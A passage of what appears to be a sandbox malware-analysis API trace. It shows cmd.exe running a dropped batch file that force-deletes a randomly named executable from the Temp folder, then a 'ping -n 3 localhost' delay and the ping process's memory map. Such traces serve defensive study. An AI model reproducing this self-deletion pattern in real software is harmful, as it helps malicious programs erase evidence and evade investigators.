0x1b [0104.288] GetCurrentDirectoryW (in: nBufferLength=0x106, lpBuffer=0x22eca4 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0104.288] GetCurrentDirectoryW (in: nBufferLength=0x106, lpBuffer=0x22dd34 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0104.288] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x22df64, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x22df68, nFileSystemNameSize=0x106 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x22df64*=0xff, lpFileSystemFlags=0x0, lpFileSystemNameBuffer="NTFS") returned 1 [0104.289] _wcsicmp (_String1="NTFS", _String2="FAT") returned 8 [0104.289] _wcsicmp (_String1="yAQb5Zg8.exe", _String2=".") returned 75 [0104.289] _wcsicmp (_String1="yAQb5Zg8.exe", _String2="..") returned 75 [0104.289] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\yAQb5Zg8.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\yaqb5zg8.exe")) returned 0x2020 [0104.289] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x322148 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0104.289] SetErrorMode (uMode=0x0) returned 0x0 [0104.289] SetErrorMode (uMode=0x1) returned 0x0 [0104.289] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\yAQb5Zg8.exe", nBufferLength=0x104, lpBuffer=0x22e388, lpFilePart=0x22e370 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\yAQb5Zg8.exe", lpFilePart=0x22e370*="yAQb5Zg8.exe") returned 0x30 [0104.289] SetErrorMode (uMode=0x0) returned 0x1 [0104.289] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp")) returned 0x2010 [0104.289] _wcsicmp (_String1="yAQb5Zg8.exe", _String2=".") returned 75 [0104.289] _wcsicmp (_String1="yAQb5Zg8.exe", _String2="..") returned 75 [0104.289] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\yAQb5Zg8.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\yaqb5zg8.exe")) returned 0x2020 [0104.289] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\yAQb5Zg8.exe", fInfoLevelId=0x0, lpFindFileData=0x330554, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x330554) returned 0x310aa8 [0104.289] DeleteFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\yAQb5Zg8.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\yaqb5zg8.exe")) returned 1 [0104.290] FindNextFileW (in: hFindFile=0x310aa8, lpFindFileData=0x330554 | out: lpFindFileData=0x330554) returned 0 [0104.290] GetLastError () returned 0x12 [0104.290] FindClose (in: hFindFile=0x310aa8 | out: hFindFile=0x310aa8) returned 1 [0104.291] _get_osfhandle (_FileHandle=1) returned 0x7 [0104.291] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0104.291] _get_osfhandle (_FileHandle=1) returned 0x7 [0104.291] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a1141ac | out: lpMode=0x4a1141ac) returned 1 [0104.291] _get_osfhandle (_FileHandle=0) returned 0x3 [0104.291] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a1141b0 | out: lpMode=0x4a1141b0) returned 1 [0104.291] SetConsoleInputExeNameW () returned 0x1 [0104.291] GetConsoleOutputCP () returned 0x1b5 [0104.291] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a114260 | out: lpCPInfo=0x4a114260) returned 1 [0104.291] SetThreadUILanguage (LangId=0x0) returned 0x409 [0104.291] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\QQZAKkLZ.cmd" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfccerykvqy\\qqzakklz.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x22f324, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0104.292] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 3 [0104.292] _get_osfhandle (_FileHandle=3) returned 0x54 [0104.292] SetFilePointer (in: hFile=0x54, lDistanceToMove=83, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x53 [0104.292] _get_osfhandle (_FileHandle=3) returned 0x54 [0104.292] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x53 [0104.292] ReadFile (in: hFile=0x54, lpBuffer=0x4a116640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x22f308, lpOverlapped=0x0 | out: lpBuffer=0x4a116640*, lpNumberOfBytesRead=0x22f308*=0x3e, lpOverlapped=0x0) returned 1 [0104.292] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a116640, cbMultiByte=62, lpWideCharStr=0x4a11c640, cchWideChar=8191 | out: lpWideCharStr="del /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\yAQb5Zg8.exe\"\r\n") returned 62 [0104.292] _get_osfhandle (_FileHandle=3) returned 0x54 [0104.292] GetFileType (hFile=0x54) returned 0x1 [0104.292] _get_osfhandle (_FileHandle=3) returned 0x54 [0104.292] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x91 [0104.293] _tell (_FileHandle=3) returned 145 [0104.293] _close (_FileHandle=3) returned 0 [0104.293] _vsnwprintf (in: _Buffer=0x4a124640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x22f0dc | out: _Buffer="\r\n") returned 2 [0104.293] _get_osfhandle (_FileHandle=1) returned 0x7 [0104.293] GetFileType (hFile=0x7) returned 0x2 [0104.293] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0104.293] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x22f09c | out: lpMode=0x22f09c) returned 1 [0104.293] _get_osfhandle (_FileHandle=1) returned 0x7 [0104.293] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a124640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x22f0c8, lpReserved=0x0 | out: lpBuffer=0x4a124640*, lpNumberOfCharsWritten=0x22f0c8*=0x2) returned 1 [0104.294] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a115260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0104.294] _vsnwprintf (in: _Buffer=0x4a115e40, _BufferCount=0x3fe, _Format="%s", _ArgList=0x22f0d8 | out: _Buffer="C:\\Users\\EEBsYm5\\Desktop") returned 24 [0104.294] _vsnwprintf (in: _Buffer=0x4a115e70, _BufferCount=0x3e6, _Format="%c", _ArgList=0x22f0d8 | out: _Buffer=">") returned 1 [0104.294] _get_osfhandle (_FileHandle=1) returned 0x7 [0104.294] GetFileType (hFile=0x7) returned 0x2 [0104.294] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0104.294] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x22f0a0 | out: lpMode=0x22f0a0) returned 1 [0104.294] _get_osfhandle (_FileHandle=1) returned 0x7 [0104.294] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a115e40*, nNumberOfCharsToWrite=0x19, lpNumberOfCharsWritten=0x22f0cc, lpReserved=0x0 | out: lpBuffer=0x4a115e40*, lpNumberOfCharsWritten=0x22f0cc*=0x19) returned 1 [0104.294] _get_osfhandle (_FileHandle=1) returned 0x7 [0104.294] GetFileType (hFile=0x7) returned 0x2 [0104.294] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0104.294] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x22f324 | out: lpMode=0x22f324) returned 1 [0104.294] _get_osfhandle (_FileHandle=1) returned 0x7 [0104.294] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x32f008*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0x22f350, lpReserved=0x0 | out: lpBuffer=0x32f008*, lpNumberOfCharsWritten=0x22f350*=0x3) returned 1 [0104.295] _vsnwprintf (in: _Buffer=0x4a124640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x22f35c | out: _Buffer=" /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\yAQb5Zg8.exe\" ") returned 58 [0104.295] _get_osfhandle (_FileHandle=1) returned 0x7 [0104.295] GetFileType (hFile=0x7) returned 0x2 [0104.295] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0104.295] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x22f31c | out: lpMode=0x22f31c) returned 1 [0104.295] _get_osfhandle (_FileHandle=1) returned 0x7 [0104.295] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a124640*, nNumberOfCharsToWrite=0x3a, lpNumberOfCharsWritten=0x22f348, lpReserved=0x0 | out: lpBuffer=0x4a124640*, lpNumberOfCharsWritten=0x22f348*=0x3a) returned 1 [0104.295] _vsnwprintf (in: _Buffer=0x4a124640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x22f37c | out: _Buffer="\r\n") returned 2 [0104.295] _get_osfhandle (_FileHandle=1) returned 0x7 [0104.295] GetFileType (hFile=0x7) returned 0x2 [0104.295] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0104.295] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x22f33c | out: lpMode=0x22f33c) returned 1 [0104.295] _get_osfhandle (_FileHandle=1) returned 0x7 [0104.295] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a124640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x22f368, lpReserved=0x0 | out: lpBuffer=0x4a124640*, lpNumberOfCharsWritten=0x22f368*=0x2) returned 1 [0104.296] _wcsicmp (_String1="del", _String2="DIR") returned -4 [0104.296] _wcsicmp (_String1="del", _String2="ERASE") returned -1 [0104.296] _wcsicmp (_String1="del", _String2="DEL") returned 0 [0104.296] GetConsoleTitleW (in: lpConsoleTitle=0x22eeec, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0104.296] GetCurrentDirectoryW (in: nBufferLength=0x106, lpBuffer=0x22eca4 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0104.296] GetCurrentDirectoryW (in: nBufferLength=0x106, lpBuffer=0x22dd34 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0104.296] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x22df64, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x22df68, nFileSystemNameSize=0x106 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x22df64*=0xff, lpFileSystemFlags=0x0, lpFileSystemNameBuffer="NTFS") returned 1 [0104.296] _wcsicmp (_String1="NTFS", _String2="FAT") returned 8 [0104.296] _wcsicmp (_String1="yAQb5Zg8.exe", _String2=".") returned 75 [0104.296] _wcsicmp (_String1="yAQb5Zg8.exe", _String2="..") returned 75 [0104.296] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\yAQb5Zg8.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\yaqb5zg8.exe")) returned 0xffffffff [0104.296] GetLastError () returned 0x2 [0104.296] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x322148 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0104.296] SetErrorMode (uMode=0x0) returned 0x0 [0104.296] SetErrorMode (uMode=0x1) returned 0x0 [0104.296] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\yAQb5Zg8.exe", nBufferLength=0x104, lpBuffer=0x22e388, lpFilePart=0x22e370 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\yAQb5Zg8.exe", lpFilePart=0x22e370*="yAQb5Zg8.exe") returned 0x30 [0104.296] SetErrorMode (uMode=0x0) returned 0x1 [0104.297] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp")) returned 0x2010 [0104.297] _wcsicmp (_String1="yAQb5Zg8.exe", _String2=".") returned 75 [0104.297] _wcsicmp (_String1="yAQb5Zg8.exe", _String2="..") returned 75 [0104.297] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\yAQb5Zg8.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\yaqb5zg8.exe")) returned 0xffffffff [0104.297] GetLastError () returned 0x2 [0104.297] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\yAQb5Zg8.exe", fInfoLevelId=0x0, lpFindFileData=0x330554, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x330554) returned 0xffffffff [0104.297] GetLastError () returned 0x2 [0104.297] _get_osfhandle (_FileHandle=2) returned 0xb [0104.297] GetFileType (hFile=0xb) returned 0x2 [0104.297] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0104.297] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x22e964 | out: lpMode=0x22e964) returned 1 [0104.297] _get_osfhandle (_FileHandle=2) returned 0xb [0104.297] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xb, lpConsoleScreenBufferInfo=0x22e998 | out: lpConsoleScreenBufferInfo=0x22e998) returned 1 [0104.297] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x40002712, dwLanguageId=0x0, lpBuffer=0x4a124640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="Could Not Find %1\r\n") returned 0x13 [0104.298] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x40002712, dwLanguageId=0x0, lpBuffer=0x4a124640, nSize=0x2000, Arguments=0x22e9d8 | out: lpBuffer="Could Not Find C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\yAQb5Zg8.exe\r\n") returned 0x41 [0104.298] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0x4a124640*, nNumberOfCharsToWrite=0x41, lpNumberOfCharsWritten=0x22e9bc, lpReserved=0x0 | out: lpBuffer=0x4a124640*, lpNumberOfCharsWritten=0x22e9bc*=0x41) returned 1 [0104.298] _get_osfhandle (_FileHandle=1) returned 0x7 [0104.298] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0104.298] _get_osfhandle (_FileHandle=1) returned 0x7 [0104.298] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a1141ac | out: lpMode=0x4a1141ac) returned 1 [0104.299] _get_osfhandle (_FileHandle=0) returned 0x3 [0104.299] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a1141b0 | out: lpMode=0x4a1141b0) returned 1 [0104.299] SetConsoleInputExeNameW () returned 0x1 [0104.299] GetConsoleOutputCP () returned 0x1b5 [0104.299] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a114260 | out: lpCPInfo=0x4a114260) returned 1 [0104.299] SetThreadUILanguage (LangId=0x0) returned 0x409 [0104.299] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\QQZAKkLZ.cmd" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfccerykvqy\\qqzakklz.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x22f324, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0104.299] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 3 [0104.299] _get_osfhandle (_FileHandle=3) returned 0x54 [0104.299] SetFilePointer (in: hFile=0x54, lDistanceToMove=145, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x91 [0104.299] _get_osfhandle (_FileHandle=3) returned 0x54 [0104.299] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x91 [0104.299] ReadFile (in: hFile=0x54, lpBuffer=0x4a116640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x22f308, lpOverlapped=0x0 | out: lpBuffer=0x4a116640*, lpNumberOfBytesRead=0x22f308*=0x0, lpOverlapped=0x0) returned 1 [0104.299] GetLastError () returned 0x0 [0104.299] _get_osfhandle (_FileHandle=3) returned 0x54 [0104.299] GetFileType (hFile=0x54) returned 0x1 [0104.300] _get_osfhandle (_FileHandle=3) returned 0x54 [0104.300] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x91 [0104.300] _get_osfhandle (_FileHandle=3) returned 0x54 [0104.300] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x91 [0104.300] ReadFile (in: hFile=0x54, lpBuffer=0x4a116640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x22f2ec, lpOverlapped=0x0 | out: lpBuffer=0x4a116640*, lpNumberOfBytesRead=0x22f2ec*=0x0, lpOverlapped=0x0) returned 1 [0104.300] GetLastError () returned 0x0 [0104.300] _get_osfhandle (_FileHandle=3) returned 0x54 [0104.300] GetFileType (hFile=0x54) returned 0x1 [0104.300] _get_osfhandle (_FileHandle=3) returned 0x54 [0104.300] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x91 [0104.300] longjmp () [0104.300] _tell (_FileHandle=3) returned 145 [0104.300] _close (_FileHandle=3) returned 0 [0104.300] CmdBatNotification () returned 0x0 [0104.300] _get_osfhandle (_FileHandle=1) returned 0x7 [0104.300] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0104.300] _get_osfhandle (_FileHandle=1) returned 0x7 [0104.300] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a1141ac | out: lpMode=0x4a1141ac) returned 1 [0104.301] _get_osfhandle (_FileHandle=0) returned 0x3 [0104.301] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a1141b0 | out: lpMode=0x4a1141b0) returned 1 [0104.301] SetConsoleInputExeNameW () returned 0x1 [0104.301] GetConsoleOutputCP () returned 0x1b5 [0104.301] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a114260 | out: lpCPInfo=0x4a114260) returned 1 [0104.301] SetThreadUILanguage (LangId=0x0) returned 0x409 [0104.301] exit (_Code=0) Process: id = "23" image_name = "ping.exe" filename = "c:\\windows\\system32\\ping.exe" page_root = "0x7ea16660" os_pid = "0xbfc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "18" os_parent_pid = "0xb88" cmd_line = "ping -n 3 localhost" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1476 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1477 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1478 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 1479 start_va = 0x1c0000 end_va = 0x1c7fff entry_point = 0x1c0000 region_type = mapped_file name = "ping.exe" filename = "\\Windows\\System32\\PING.EXE" (normalized: "c:\\windows\\system32\\ping.exe") Region: id = 1480 start_va = 0x1f0000 end_va = 0x22ffff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 1481 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1482 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1483 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 1484 start_va = 0x7ffd5000 end_va = 0x7ffd5fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd5000" filename = "" Region: id = 1485 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 1490 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1491 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 1492 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1493 start_va = 0x2c0000 end_va = 0x3bffff entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 1494 start_va = 0x540000 end_va = 0x54ffff entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 1495 start_va = 0x737c0000 end_va = 0x737c6fff entry_point = 0x737c0000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 1496 start_va = 0x737d0000 end_va = 0x737ebfff entry_point = 0x737d0000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 1497 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1498 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1499 start_va = 0x75810000 end_va = 0x75815fff entry_point = 0x75810000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 1500 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 1501 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1502 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 1503 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1504 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1505 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 1506 start_va = 0x77380000 end_va = 0x773b4fff entry_point = 0x77380000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 1507 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1508 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1509 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 1510 start_va = 0xc0000 end_va = 0x187fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 1511 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1512 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 1513 start_va = 0x190000 end_va = 0x196fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 1514 start_va = 0x1a0000 end_va = 0x1a1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 1515 start_va = 0x1b0000 end_va = 0x1b2fff entry_point = 0x1b0000 region_type = mapped_file name = "ping.exe.mui" filename = "\\Windows\\System32\\en-US\\ping.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\ping.exe.mui") Region: id = 1516 start_va = 0x1d0000 end_va = 0x1d0fff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 1517 start_va = 0x1e0000 end_va = 0x1e0fff entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1518 start_va = 0x3c0000 end_va = 0x4c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003c0000" filename = "" Region: id = 1519 start_va = 0x550000 end_va = 0x114ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 1520 start_va = 0x1150000 end_va = 0x141efff entry_point = 0x1150000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1521 start_va = 0x74e10000 end_va = 0x74e4bfff entry_point = 0x74e10000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 1522 start_va = 0x1420000 end_va = 0x150ffff entry_point = 0x0 region_type = private name = "private_0x0000000001420000" filename = "" Region: id = 1523 start_va = 0x74960000 end_va = 0x74964fff entry_point = 0x74960000 region_type = mapped_file name = "wshtcpip.dll" filename = "\\Windows\\System32\\WSHTCPIP.DLL" (normalized: "c:\\windows\\system32\\wshtcpip.dll") Region: id = 1524 start_va = 0x74e00000 end_va = 0x74e05fff entry_point = 0x74e00000 region_type = mapped_file name = "wship6.dll" filename = "\\Windows\\System32\\wship6.dll" (normalized: "c:\\windows\\system32\\wship6.dll") Region: id = 1525 start_va = 0x74cd0000 end_va = 0x74d13fff entry_point = 0x74cd0000 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 1526 start_va = 0x1510000 end_va = 0x167ffff entry_point = 0x0 